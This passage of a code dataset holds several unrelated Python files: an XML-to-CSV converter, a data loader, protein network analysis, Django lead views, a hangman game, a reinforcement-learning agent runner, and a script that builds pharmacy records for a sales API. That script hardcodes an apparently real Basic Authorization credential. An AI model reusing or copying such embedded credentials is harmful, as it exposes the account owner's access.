enumerate(tqdm.tqdm(glob.glob(f\"{SOURCE_DIR}/*.xml\"))):\n with open(file) as f:\n doc = epidoc.load(f)\n docs.append(doc)\n # if i > 10:\n # break\n # break\n\noutput_docs = []\n\n\n# Get Title, All instances of idno and terms\n# Terms hide under textClass\n\nmax_terms = 0\n\nfor doc in tqdm.tqdm(docs):\n line = {}\n line[\"title\"] = doc.title\n line[\"idno\"] = doc.idno\n for i, term in enumerate(doc.terms):\n # prepend _{i} to each key inside term\n for key in term.copy().keys():\n term[f\"term_{key}_{i}\"] = term.pop(key) \n line[f\"term_{i}\"] = term\n if max_terms < i:\n max_terms = i\n\n output_docs.append(line)\n\n\n\n# Write to JSON\nwith open(f\"{TARGET_DIR}/output.json\", \"w\") as f:\n json.dump(output_docs, f, indent=4)\n\n\n\n# Make output_docs a dataframe\ndf = pd.DataFrame(output_docs)\n# flatten the idno dictionary into the dataframe\ndf = pd.concat([df.drop([\"idno\"], axis=1), df[\"idno\"].apply(pd.Series)], axis=1)\nfor i in range(max_terms+1):\n print(i)\n df = pd.concat([df.drop([f\"term_{i}\"], axis=1), df[f\"term_{i}\"].apply(pd.Series)], axis=1)\n\n# Write to CSV\ndf.to_csv(f\"{TARGET_DIR}/output.csv\", index=False)\n\n\n","repo_name":"Denubis/EpidocPoC","sub_path":"epicdoc2csv.py","file_name":"epicdoc2csv.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35051725354","text":"import decimal\nimport reporter\nimport gevent\n\ndef Pi():\n \"\"\"\n Compute Pi to the current precision.\n\n Examples\n --------\n >>> print(pi())\n 3.141592653589793238462643383\n\n Notes\n -----\n Taken from https://docs.python.org/3/library/decimal.html#recipes\n \"\"\"\n decimal.getcontext().prec += 2 # extra digits for intermediate steps\n three = decimal.Decimal(3) # substitute \"three=3.0\" for regular floats\n lasts, t, s, n, na, d, da = 0, three, 3, 1, 0, 0, 24\n while s != lasts:\n lasts = s\n n, na = n + na, na + 8\n d, da = d + da, da + 32\n t = (t * n) / d\n s += t\n decimal.getcontext().prec -= 2\n return +s # unary plus applies the new precision\n\n\ndef run_pi_forever():\n while True:\n pi = Pi()\n gevent.sleep(0)\n\nif __name__ == \"__main__\":\n reporter.Reporter(\"pid_stats.conf\")\n decimal.getcontext().prec = 1000\n pirunner = gevent.spawn(run_pi_forever)\n gevent.joinall([pirunner])\n # print(time.ctime(time.time()))\n","repo_name":"efology/pid_stats","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32216336239","text":"import numpy as np\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nfrom torch.utils.data.dataloader import default_collate\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\n\nclass BaseDataLoader(DataLoader):\n \"\"\"\n Base class for all data loaders\n \"\"\"\n\n def __init__(self, dataset, batch_size, shuffle, validation_split, num_workers, collate_fn=default_collate):\n self.validation_split = validation_split\n self.shuffle = shuffle\n\n self.batch_idx = 0\n self.n_samples = len(dataset)\n\n self.sampler, self.valid_sampler = self._split_sampler(self.validation_split)\n\n self.init_kwargs = {\n 'dataset': dataset,\n 'batch_size': batch_size,\n 'shuffle': self.shuffle,\n 'collate_fn': collate_fn,\n 'num_workers': num_workers\n }\n super().__init__(sampler=self.sampler, **self.init_kwargs)\n\n def _split_sampler(self, split):\n if split == 0.0:\n return 
None, None\n\n idx_full = np.arange(self.n_samples)\n\n np.random.seed(0)\n np.random.shuffle(idx_full)\n\n if isinstance(split, int):\n assert split > 0\n assert split < self.n_samples, \"validation set size is configured to be larger than entire dataset.\"\n len_valid = split\n else:\n len_valid = int(self.n_samples * split)\n\n valid_idx = idx_full[0:len_valid]\n train_idx = np.delete(idx_full, np.arange(0, len_valid))\n\n train_sampler = SubsetRandomSampler(train_idx)\n valid_sampler = SubsetRandomSampler(valid_idx)\n\n # turn off shuffle option which is mutually exclusive with sampler\n self.shuffle = False\n self.n_samples = len(train_idx)\n\n return train_sampler, valid_sampler\n\n def split_validation(self):\n if self.valid_sampler is None:\n return None\n else:\n return DataLoader(sampler=self.valid_sampler, **self.init_kwargs)\n\n\nclass Base_dataset(Dataset):\n def __init__(self, config, mode, classes):\n \"\"\"\n\n Args:\n config (yaml): configuration file\n mode (string): 'train' 'validation' 'test'\n classes (int):\n \"\"\"\n super(Base_dataset, self).__init__()\n\n self.classes = classes\n\n self.mode = mode\n self.list_IDs, self.list_glosses = [], []\n self.config = config\n\n def __len__(self):\n \"\"\"\n\n Returns:\n (int) Number of samples\n \"\"\"\n return len(self.list_IDs)\n\n def __getitem__(self, index):\n \"\"\"\n Basically, __getitem__ of a torch dataset.\n Args:\n index (int): Index of the sample to be loaded.\n \"\"\"\n\n raise NotImplementedError\n\n def feature_loader(self, index):\n \"\"\"\n\n Args:\n index (int): Index of the sample to be loaded.\n \"\"\"\n raise NotImplementedError\n\n def video_loader(self, index):\n \"\"\"\n Load video function\n Args:\n index (int): Index of the sample to be loaded.\n \"\"\"\n raise NotImplementedError\n","repo_name":"iliasprc/COVIDNet","sub_path":"base/base_data_loader.py","file_name":"base_data_loader.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"2"} +{"seq_id":"14366012543","text":"from os.path import exists\n\nimport networkx as nx\nimport pandas as pd\n\nimport PC2P.Analysis.PredictedClusters_Analysis as pc2p_analysis\nimport lib.centrality\nimport lib.cluster\nimport lib.constants\nimport lib.files\nimport lib.graph\nimport lib.shapely_betweenness\n\n\ndef node_dataframe(\n network_name,\n clusters_name,\n _degree=False,\n _inviable=False,\n _icp55_shell=False,\n _pim1_shell=False,\n _betweenness=False,\n _closeness=False,\n _bridging=False,\n _eigenvector=False,\n _shapeley_betweenness=False,\n _cluster_id=False,\n _cluster_size=False,\n _cluster_degree=False,\n _cluster_eigenvector=False,\n _cluster_closeness=False,\n _cluster_betweenness=False,\n _cluster_shapely_betweenness=False\n):\n \"\"\"\n\n :param network: The filename (without the extension) of the network. E.g. icp55-cc-900-inv\n :param clusters: The filename (without the path or extension) of the clusters. E.g. 
mcl-2.5\n :param _columns: The desired computations.\n :return:\n \"\"\"\n\n # Read in the network.\n network = lib.graph.read_weighted_edgelist(lib.files.make_filepath_to_networks(f\"{network_name}.txt\"))\n\n # Read in the clusters.\n clusters_filename = lib.files.make_clusters_filename(network_name, clusters_name)\n clusters_filepath = lib.files.make_filepath_to_clusters(clusters_filename)\n clusters = lib.cluster.read_csv(clusters_filepath)\n\n # Make sure the clusters partition the network.\n clusters_proteins = lib.cluster.proteins(clusters)\n assert len(clusters_proteins) == len(network.nodes())\n assert set(clusters_proteins) == set(network.nodes())\n\n # Cast clusters to a subgraph datatype for algorithms.\n clusters = list(map(network.subgraph, clusters))\n\n # Define the columns of the dataframe.\n columns = {\n 'protein': [],\n 'degree': [],\n 'inviable': [],\n 'icp55_shell': [],\n 'pim1_shell': [],\n 'betweenness': [],\n 'eigenvector': [],\n 'closeness': [],\n 'bridging': [],\n 'shapely': [],\n 'cluster_id': [],\n 'cluster_size': [],\n 'cluster_degree': [],\n 'cluster_eigenvector': [],\n 'cluster_closeness': [],\n 'cluster_betweenness': [],\n 'cluster_shapely_betweenness': []\n }\n\n # Prepare data for algorithms.\n print(\"Preparing data\")\n inviable_proteins = lib.graph.read_inviable_proteins()\n if _icp55_shell or _pim1_shell:\n shortest_path_lengths = dict(nx.shortest_path_length(network))\n if _icp55_shell:\n icp55_shell = shortest_path_lengths[lib.constants.ICP55]\n if _pim1_shell:\n pim1_shell = shortest_path_lengths[lib.constants.PIM1]\n\n # Run flagged algorithms.\n if _degree:\n degree = network.degree()\n if _inviable:\n inviable = {node: 1 if node in inviable_proteins else 0 for node in network}\n if _betweenness:\n print(\"Computing betweenness\")\n betweenness = nx.betweenness_centrality(network)\n if _closeness:\n print(\"Computing closeness\")\n closeness = nx.closeness_centrality(network)\n if _bridging:\n print(\"Computing bridging\")\n if _betweenness:\n bridging = lib.centrality.bridging_centrality(network,\n betweeness=betweenness) # Pass betweeness to avoid recalc.\n else:\n bridging = lib.centrality.bridging_centrality(network) # We haven't computed betweenness.\n if _eigenvector:\n print(\"Computing eigenvector\")\n eigenvector = nx.eigenvector_centrality(network)\n if _shapeley_betweenness:\n print(\"Computing shapely betweenness\")\n shapely = lib.shapely_betweenness.ShapelyBetweeness(network)\n\n # Run flagged algorithms in clusters.\n if _cluster_closeness:\n print(\"Computing closeness in cluster\")\n cluster_closeness = [nx.closeness_centrality(cluster) for cluster in clusters]\n if _cluster_eigenvector:\n print(\"Computing eigenvector in cluster\")\n cluster_eigenvector = [nx.eigenvector_centrality(cluster) for cluster in clusters]\n if _cluster_betweenness:\n print(\"Computing betweenness in cluster\")\n cluster_betweenness = [nx.betweenness_centrality(cluster) for cluster in clusters]\n if _cluster_shapely_betweenness:\n print(\"Computing shapely betweenness in cluster\")\n cluster_shapely_betweenness = [lib.shapely_betweenness.ShapelyBetweeness(cluster) for cluster in clusters]\n\n # Iterate over cluster_ids (it's index) and clusters\n # Since clusters form a partition of the network we therefore iterate over every node exactly once.\n print(\"Arranging columns\")\n for cluster_id, cluster in enumerate(clusters):\n for node in cluster:\n columns['protein'].append(node)\n if _degree:\n columns['degree'].append(degree[node])\n if _inviable:\n 
columns['inviable'].append(inviable[node])\n if _icp55_shell:\n columns['icp55_shell'].append(icp55_shell[node])\n if _pim1_shell:\n columns['pim1_shell'].append(pim1_shell[node])\n if _betweenness:\n columns['betweenness'].append(betweenness[node])\n if _closeness:\n columns['closeness'].append(closeness[node])\n if _bridging:\n columns['bridging'].append(bridging[node])\n if _eigenvector:\n columns['eigenvector'].append(eigenvector[node])\n if _shapeley_betweenness:\n columns['shapely'].append(shapely[node])\n if _cluster_id:\n columns['cluster_id'].append(cluster_id)\n if _cluster_size:\n columns['cluster_size'].append(len(cluster))\n if _cluster_degree:\n columns['cluster_degree'].append(cluster.degree()[node])\n if _cluster_closeness:\n columns['cluster_closeness'].append(cluster_closeness[cluster_id][node])\n if _cluster_eigenvector:\n columns['cluster_eigenvector'].append(cluster_eigenvector[cluster_id][node])\n if _cluster_betweenness:\n columns['cluster_betweenness'].append(cluster_betweenness[cluster_id][node])\n if _cluster_shapely_betweenness:\n columns['cluster_shapely_betweenness'].append(cluster_shapely_betweenness[cluster_id][node])\n\n # Remove empty columns\n columns = {k: v for (k, v) in columns.items() if v != []}\n\n # Write the dataframe to a file\n print(\"Adding dataframe to file\")\n filename = f\"{network_name}.{clusters_name}.nodes.dataframe.csv\"\n filepath = lib.files.make_path_to_dataframes(filename)\n add_dataframe_columns(filepath, columns, on=['protein'])\n\n\ndef cluster_dataframe(network_name, clusters_name, filepath=None):\n # These are all the columns\n columns = {\n 'name': [],\n 'num_clusters': [],\n 'percent_connected': [],\n # 'modularity': [],\n 'sensitivity': [],\n 'positive predicted value': [],\n 'accuracy': [],\n 'fraction_matched': [],\n 'separation': [],\n 'precision': [],\n 'recall': [],\n 'f-measure': [],\n 'mmr': [],\n 'sensitivity_sgd': [],\n 'positive_predicted_value_sgd': [],\n 'accuracy_sgd': [],\n 'fraction_matched_sgd': [],\n 'separation_sgd': [],\n 'precision_sgd': [],\n 'recall_sgd': [],\n 'f-measure_sgd': []\n }\n\n network = lib.graph.read_network(network_name)\n\n clusters = lib.cluster.read_clusters(network_name, clusters_name)\n clusters = list(map(set, clusters)) # Convert to sets for PC2P analysis\n clusters = list(filter(lambda x: len(x) >= 3, clusters))\n\n # Validated complexes\n yhtp2008 = lib.cluster.read_yhtp2008()\n yhtp2008 = list(map(set, yhtp2008)) # Convert to sets for PC2P analysis\n yhtp2008 = list(filter(lambda x: len(x) >= 3, yhtp2008))\n sgd = lib.cluster.read_sgd()\n sgd = list(map(set, sgd)) # Convert to sets for PC2P analysis\n sgd = list(filter(lambda x: len(x) >= 3, sgd))\n\n columns['name'].append(clusters_name)\n columns['num_clusters'].append(len(clusters))\n columns['percent_connected'].append(len(\n [cluster for cluster in clusters if nx.is_connected(network.subgraph(cluster))]\n ) / len(clusters))\n # columns['modularity'].append(nx.algorithms.community.modularity(network, clusters, weight=None))\n\n columns['sensitivity'].append(pc2p_analysis.clusteringwise_sensitivity(yhtp2008, clusters))\n columns['positive predicted value'].append(pc2p_analysis.positive_predictive_value(yhtp2008, clusters))\n columns['accuracy'].append(pc2p_analysis.accuracy(yhtp2008, clusters))\n columns['fraction_matched'].append(pc2p_analysis.fraction_matched(yhtp2008, clusters))\n columns['separation'].append(pc2p_analysis.clusteringwise_separation(yhtp2008, clusters))\n 
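# Jaccard-overlap precision/recall/F-measure of the clustering against the same reference complexes.\n    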
columns['precision'].append(pc2p_analysis.precision_Jaccard(yhtp2008, clusters))\n columns['recall'].append(pc2p_analysis.recall_Jaccard(yhtp2008, clusters))\n columns['f-measure'].append(pc2p_analysis.F_measure_Jaccard(yhtp2008, clusters))\n columns['mmr'].append(pc2p_analysis.maximum_matching_ratio(yhtp2008, clusters))\n\n columns['sensitivity_sgd'].append(pc2p_analysis.clusteringwise_sensitivity(sgd, clusters))\n columns['positive_predicted_value_sgd'].append(pc2p_analysis.positive_predictive_value(sgd, clusters))\n columns['accuracy_sgd'].append(pc2p_analysis.accuracy(sgd, clusters))\n columns['fraction_matched_sgd'].append(pc2p_analysis.fraction_matched(sgd, clusters))\n columns['separation_sgd'].append(pc2p_analysis.clusteringwise_separation(sgd, clusters))\n columns['precision_sgd'].append(pc2p_analysis.precision_Jaccard(sgd, clusters))\n columns['recall_sgd'].append(pc2p_analysis.recall_Jaccard(sgd, clusters))\n columns['f-measure_sgd'].append(pc2p_analysis.F_measure_Jaccard(sgd, clusters))\n\n columns = {k:v for (k,v) in columns.items() if v != []}\n if filepath is None:\n filename = lib.files.make_clusters_dataframe_filename(network_name)\n filepath = lib.files.make_path_to_dataframes(filename)\n add_dataframe_rows(filepath, columns)\n\n\ndef add_dataframe_columns(filepath, columns, on=None):\n \"\"\"\n This function appends columns to an existing dataframe file or creates a brand new file is none exists.\n :param filepath:\n :param columns: A dict of {col_name: rows}\n :param on: The columns to merge old and new data on (same as df.merge)\n :return:\n \"\"\"\n # Create the dataframe.\n df = pd.DataFrame.from_dict(columns)\n\n # If no file exists, write to the filepath.\n if not exists(filepath):\n df.to_csv(filepath)\n return\n\n # If a file exists, we need to know what columns to merge the new data on.\n assert on is not None\n\n # Then read the existing file.\n df2 = pd.read_csv(filepath, index_col=0, header=0)\n df2 = df2.astype({'protein': str}) # Networks such as karate-club and gnp-100-0.5 use integer node names.\n\n # Assert the same number of rows exist (i.e. 
all proteins accounted for)\n assert len(df) == len(df2)\n\n # Remove overlapping columns from the old dataframe.\n overlap = [col for col in df.columns if col in df2.columns and col not in on]\n df2 = df2.drop(columns=overlap)\n\n # Merge the dataframes on the index\n df3 = df2.merge(df, on=on)\n\n # Write to the filepath\n df3.to_csv(filepath)\n\n\ndef add_dataframe_rows(filepath, columns):\n # Create the dataframe.\n df = pd.DataFrame.from_dict(columns)\n\n # If no file exists, write to the filepath.\n if not exists(filepath):\n df.to_csv(filepath)\n return\n\n # Then read the existing file.\n df2 = pd.read_csv(filepath, index_col=0, header=0)\n # df2 = df2.astype({'protein': str}) # Networks such as karate-club and gnp-100-0.5 use integer node names.\n\n # Assert we have the same columns\n all(df.columns == df2.columns)\n\n # Concatenate the new rows to the old rows\n df3 = pd.concat([df2, df], ignore_index=True)\n\n df3.to_csv(filepath)\n\n\ndef add_min_shell(filepath):\n \"\"\"df must have icp55_shell and pim1_shell\"\"\"\n df = pd.read_csv(filepath, header=0, index_col=0)\n assert \"icp55_shell\" in df.columns and \"pim1_shell\" in df.columns\n df['min-shell'] = df['icp55_shell'].combine(df['pim1_shell'], min, 0)\n df.to_csv(filepath)\n\n\ndef add_min_shell_weighted_centralities(filepath):\n df = pd.read_csv(filepath, header=0, index_col=0)\n df['betweenness/min-shell'] = df['betweenness'] / df['min-shell']\n df['closeness/min-shell'] = df['closeness'] / df['min-shell']\n df['eigenvector/min-shell'] = df['eigenvector'] / df['min-shell']\n df['bridging/min-shell'] = df['bridging'] / df['min-shell']\n df.to_csv(filepath)\n","repo_name":"jkasimotto/PPI-Network-Analysis","sub_path":"lib/dataframes.py","file_name":"dataframes.py","file_ext":"py","file_size_in_byte":12908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19199544599","text":"import requests\nimport json\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom openpyxl import load_workbook\nimport get_teritory\nimport get_city\nimport get_party_type\nimport get_potential\nimport get_products\nimport get_category\n\nurl = \"https://sfa3.mankindpharma.in/wsfaapi/api/newparty/saveChemist\"\n\nroot = tk.Tk()\nroot.withdraw()\nfile_path = filedialog.askopenfilename()\n\n\nwb = load_workbook(file_path)\nws = wb[\"Sheet1\"]\n\nteritories = get_teritory.run()\ncities = get_city.run()\nparty_types = get_party_type.run()\npotentials = get_potential.run()\nproducts = get_products.run()\ncategories = get_category.run()\n\ndef get_teritory_code(teritory_name):\n try:\n terotory_code = teritories[teritory_name]\n return terotory_code\n except:\n raise Exception(f\"Code not found for a Teritory named {teritory_name}\")\n\ndef get_city_code(city_name):\n try:\n citie_code = cities[city_name]\n return citie_code\n except:\n raise Exception(f\"Code not found for a City named {city_name}\")\n\ndef get_party_type_code(patry_type_name):\n try:\n patry_type_code = party_types[patry_type_name]\n return patry_type_code\n except:\n raise Exception(f\"Code not found for a Party type named {patry_type_name}\")\n\ndef get_potential_code(potential_name):\n try:\n potential_code = potentials[potential_name]\n return potential_code\n except:\n raise Exception(f\"Code not found for a Potential named {potential_name}\")\n\ndef get_product_code(product_name):\n try:\n product_code = products[product_name]\n return product_code\n except:\n raise Exception(f\"'Code not found for a Product named 
{product_name}\")\n\n\ndef get_category_code(category_name):\n category_codes = {'0-5000': 'D', '5001-20000': 'C', '20001-50000': 'B', '50001-100000': 'A', '100001-ABOVE': 'A+'}\n try:\n category_code = categories[category_codes[category_name]]\n return category_code\n except KeyError:\n raise Exception(f\"Code not found for a Category named {category_name}\")\n\n\nif __name__ == '__main__':\n n = 2\n while n < 40:\n if ws.cell(row=n, column=1).value == '' or ws.cell(row=n, column=1).value is None:\n break\n payload = json.dumps([\n {\n \"PARTYCODE\": None,\n \"PARTYNAME\": ws.cell(row=n, column=1).value,\n \"TYPECODE\": get_party_type_code(ws.cell(row=n, column=10).value),\n \"CATGCODE\": get_category_code(ws.cell(row=n, column=11).value),\n \"AREACODE\": get_teritory_code(ws.cell(row=n, column=9).value),\n \"CITYCODE\": get_city_code(ws.cell(row=n, column=8).value),\n \"ADDRESS\": ws.cell(row=n, column=2).value,\n \"PINCODE\": ws.cell(row=n, column=4).value,\n \"LANDMARK\": ws.cell(row=n, column=3).value,\n \"MOBILE\": ws.cell(row=n, column=5).value,\n \"EMAIL\": \"\",\n \"POTCODE\": get_potential_code(ws.cell(row=n, column=11).value),\n \"SUPPORT\": ws.cell(row=n, column=7).value,\n \"FREQUENCY\": \"2\",\n \"STAFFCODE\": \"109320\",\n \"STATUS\": \"1\",\n \"DIVCODE\": \"96\",\n \"CONTACT\": ws.cell(row=n, column=6).value,\n \"RXCODE1\": get_product_code(ws.cell(row=n, column=12).value),\n \"RXSUPORT1\": ws.cell(row=n, column=13).value,\n \"RXCODE2\": \"\",\n \"RXSUPORT2\": \"\",\n \"RXCODE3\": \"\",\n \"RXSUPORT3\": \"\",\n \"RXCODE4\": \"\",\n \"RXSUPORT4\": \"\",\n \"REMARKS\": \"\"\n }\n ])\n print(payload)\n n += 1\n headers = {\n 'Authorization': 'Basic MTAwMzkwNTE6MTA5MzIw',\n 'Content-Type': 'application/json'\n }\n #response = requests.request(\"POST\", url, headers=headers, data=payload)\n #print(response.text)\n\n\n","repo_name":"tamilmani-murugan/mankind","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23777698634","text":"# Problem Set 2\n# Name: Deniz Sert\n# Collaborators: Frank Gonzalez\n# Time spent: 5 hr\n# Late Days used: 1\n\nimport random\nimport string\n\n# -----------------------------------\n# HELPER CODE\n# -----------------------------------\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef load_words():\n '''\n returns: list, a list of valid words. 
Words are strings of lowercase letters.\n\n Depending on the size of the word list, this function may\n take a while to finish.\n '''\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\n\ndef choose_word(wordlist):\n '''\n wordlist (list): list of words (strings)\n\n returns: a word from wordlist at random\n '''\n return random.choice(wordlist)\n\n# -----------------------------------\n# END OF HELPER CODE\n# -----------------------------------\n\n\n# Load the list of words to be accessed from anywhere in the program\nwordlist = load_words()\n\ndef check_victory(secret_word, letters_guessed):\n '''\n secret_word: string, the lowercase word the user is guessing\n letters_guessed: list (of lowercase letters), the letters that have been\n guessed so far\n\n returns: boolean, True if all the letters of secret_word are in letters_guessed,\n False otherwise\n '''\n\n \n #checks to see if there are no guesses\n if len(letters_guessed) == 0:\n return False\n if len(secret_word)== 0:\n return True\n #checks to see if there are any letters in the Secret Words not within\n #the list of guessed letters\n for x in secret_word:\n if x not in letters_guessed:\n return False\n return True\n\n\n\n# Other tries\n# if secret_word==0:\n# return True\n# else:\n# if letters_guessed[0]==secret_word[0]:\n# secret_word\n#\n#\n\n# counter = 0\n# for x in range [0:letters_guessed]:\n# for y in range [0:letters_guessed]:\n# if letters_guessed[x]==secret_word[y]:\n# counter+=1\n# if counter==len(secret_word):\n# return True\n# return False\n# counter = 0\n# while (counter0):\n #informs player on number of guesses left\n print(\"You have\", num_guesses, \"guesses left.\")\n print(\"Available letters:\", get_remaining_letters(letters_guessed))\n \n #user enters guess\n guess = input(\"Please guess a letter: \")\n guess = str.lower(guess)\n\n #game handles it if a special character was inputted\n if str.isalpha(guess) is False:\n print(\"That is not a valid letter. Please enter an input from the alphabet:\")\n elif (guess in letters_guessed):\n print(\"Oops! You've already guessed that letter:\", get_word_progress(secret_word_, letters_guessed))\n \n # incorrect guess\n elif (guess not in secret_word_):\n letters_guessed.append(guess)\n print(\"Oops! That letter is not in my word:\", get_word_progress(secret_word_, letters_guessed))\n num_guesses-=1\n # correct guess\n else:\n letters_guessed.append(guess)\n print(\"Good guess:\", get_word_progress(secret_word_, letters_guessed))\n\n #ran out of guesses\n \n print(\"--------------\")\n if num_guesses<=0:\n print(\"Sorry, you ran out of guesses. 
The word was \" + secret_word_)\n break\n elif check_victory(secret_word_, letters_guessed):\n print(\"Congratulations, you won!\")\n\n\n\n # finds num of unique characters in the Secret Word\n unique = []\n\n for x in secret_word_:\n if x in unique:\n pass\n else:\n unique.append(x)\n\n #computes score\n print(\"Your total score for this game was\", (2 * (num_guesses) + 3 * (len(secret_word_) + len(unique))))\n break\n\n \n\n\n# When you've completed your hangman function, scroll down to the bottom\n# of the file and uncomment the lines to test\n\n# -----------------------------------\n\ndef choose_letter(secret_word, letters_guessed):\n '''\n * Chooses a random letter to help the player\n \n \n '''\n l = []\n for x in secret_word:\n if x in letters_guessed:\n pass\n else:\n l.append(x)\n new = random.randint(0, len(l)-1)\n revealed_letter = l[new]\n \n return revealed_letter\n \ndef hangman_with_help(secret_word_):\n '''\n secret_word: string, the secret word to guess.\n\n Starts up an interactive game of Hangman.\n\n * At the start of the game, let the user know how many\n letters the secret_word contains and how many guesses they start with.\n\n * The user should start with 10 guesses.\n\n * Before each round, you should display to the user how many guesses\n they have left and the letters that the user has not yet guessed.\n\n * Ask the user to supply one guess per round. Remember to make sure that\n the user puts in a letter.\n\n * The user should receive feedback immediately after each guess\n about whether their guess appears in the computer's word.\n\n * After each guess, you should display to the user the\n partially guessed word so far.\n\n * If the guess is the symbol !, you should reveal to the user one of the\n letters missing from the word at the cost of 2 guesses. If the user does\n not have 2 guesses remaining, print a warning message. Otherwise, add\n this letter to their guessed word and continue playing normally.\n\n Follows the other limitations detailed in the problem write-up.\n '''\n # FILL IN YOUR CODE HERE AND DELETE \"pass\"\n num_guesses = 10\n\n #initialize game\n print(\"Welcome to Hangman!\")\n print(\"I am thinking of a word that is\", len(secret_word_), \"letters long.\")\n print(\"--------------\")\n \n\n\n letters_guessed = []\n hint = \"\"\n called_out = False\n\n while(num_guesses>0):\n #inform player on number of guesses\n print(\"You have\", num_guesses, \"guesses left.\")\n print(\"Available letters:\", get_remaining_letters(letters_guessed))\n \n #user guesses\n guess = input(\"Please guess a letter: \")\n guess = str.lower(guess)\n if str.isalpha(guess) is False:\n #hint\n if guess == \"!\":\n if num_guesses<=2:\n print(\"Oops! Not enough guesses left!\", get_word_progress(secret_word_, letters_guessed))\n else:\n hint = choose_letter(secret_word_, letters_guessed)\n print(\"Letter revealed: \", hint)\n letters_guessed+=hint\n num_guesses-=2\n print(get_word_progress(secret_word_, letters_guessed))\n #yeet\n #special character (not hint)\n else:\n print(\"Oops! That is not a valid letter. Please input a letter from the alphabet\", get_word_progress(secret_word_, letters_guessed))\n called_out = True\n\n #already guessed letter\n if (guess in letters_guessed):\n if (hint in letters_guessed):\n pass\n else:\n print(\"Oops! 
You've already guessed that letter:\", get_word_progress(secret_word_, letters_guessed))\n\n #handles if hint was given and incorrect guess\n elif (guess not in secret_word_):\n if (hint in letters_guessed):\n pass\n else:\n if called_out is True:\n pass\n else:\n letters_guessed.append(guess)\n print(\"Oops! That letter is not in my word:\", get_word_progress(secret_word_, letters_guessed))\n num_guesses -= 1\n #correct guess\n else:\n letters_guessed.append(guess)\n print(\"Good guess:\", get_word_progress(secret_word_, letters_guessed))\n\n print(\"--------------\")\n #ran out of guesses\n if num_guesses <= 0:\n print(\"Sorry, you ran out of guesses. The word was \" + secret_word_)\n break\n #win\n elif check_victory(secret_word_, letters_guessed):\n print(\"Congratulations, you won!\")\n\n # finds num of unique characters in the Secret Word\n unique = []\n\n for x in secret_word_:\n if x in unique:\n pass\n else:\n unique.append(x)\n\n #prints score\n print(\"Your total score for this game was\", (2 * (num_guesses) + 3 * (len(secret_word_) + len(unique))))\n break\n\n\n# When you've completed your hangman_with_help function, comment the two similar\n# lines below that were used to run the hangman function, and then uncomment\n# those two lines and run this file to test!\n\n# Hint: You might want to pick your own secret_word while you're testing.\n\n\nif __name__ == \"__main__\":\n # To test part 2, uncomment the following two lines.\n\n #secret_word = choose_word(wordlist)\n #hangman(\"ab\")\n\n###############\n\n # To test part 3, comment out the above lines and\n # uncomment the following two lines.\n\n secret_word = choose_word(wordlist)\n hangman_with_help(secret_word)\n\n # SUBMISSION INSTRUCTIONS\n # -----------------------\n # It doesn't matter if the lines above are commented in or not\n # when you submit your pset. 
However, please run ps2_student_tester.py\n # one more time before submitting to make sure all the tests pass.\n\n","repo_name":"dsert1/Hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":13027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5462139529","text":"from rest_framework.generics import ListAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom ..models import Lead\nfrom ..serializers import BasicLeadSerializer, LeadSerializer\n\n\nclass ListLeadAPIView(APIView):\n def get(self, request):\n leads = Lead.objects.all()\n\n lead_list = []\n for lead in leads:\n data = {\n 'id': lead.id,\n 'first_name': lead.first_name,\n 'last_name': lead.last_name,\n 'email': lead.email,\n 'phone': lead.phone,\n 'message': lead.message\n }\n lead_list.append(data)\n\n return Response(lead_list)\n\n\nclass ListLeadWithSerializerAPIView(APIView):\n def get(self, request):\n leads = Lead.objects.all()\n\n # Method 1:\n lead_list = []\n for lead in leads:\n serializer = BasicLeadSerializer(lead)\n lead_list.append(serializer.data)\n\n # Method 2:\n serializer = BasicLeadSerializer(leads, many=True)\n lead_list = serializer.data\n\n return Response(lead_list)\n\n\nclass ListLeadGenericAPIView(ListAPIView):\n queryset = Lead.objects.all()\n serializer_class = LeadSerializer\n","repo_name":"yothinix/pysomtum-generic-demo","sub_path":"pysomtum/leads/views/list_api_views.py","file_name":"list_api_views.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"31027829674","text":"import gymnasium as gym\nfrom stable_baselines3 import PPO\nfrom pico8gym.envs import CelesteEnv, PicoVecEnv, SB3VecEnvWrapper\nfrom stable_baselines3.common.callbacks import CheckpointCallback, EvalCallback, CallbackList\nfrom stable_baselines3.common.vec_env import VecFrameStack\n\ndef makeEnv():\n return gym.make('pico8gym/celeste-v0')\nenv = SB3VecEnvWrapper(PicoVecEnv([makeEnv] * 1))\nenv = VecFrameStack(env, n_stack=4)\n\n# model = PPO.load(\"logs/best_model\", env=env)\n# model = PPO.load(\"models/best_celeste_t3\", env=env)\nmodel = PPO.load(\"logs/celeste_t5_399960_steps\", env=env)\nvec_env = model.get_env()\nobs = vec_env.reset()\nfor i in range(10000):\n action, _state = model.predict(obs, deterministic=True)\n obs, reward, done, info = vec_env.step(action)\n vec_env.render()\n\nenv.close()","repo_name":"Jeffjewett27/PICO-Gym","sub_path":"agents/celeste_run.py","file_name":"celeste_run.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19662923903","text":"from django.db 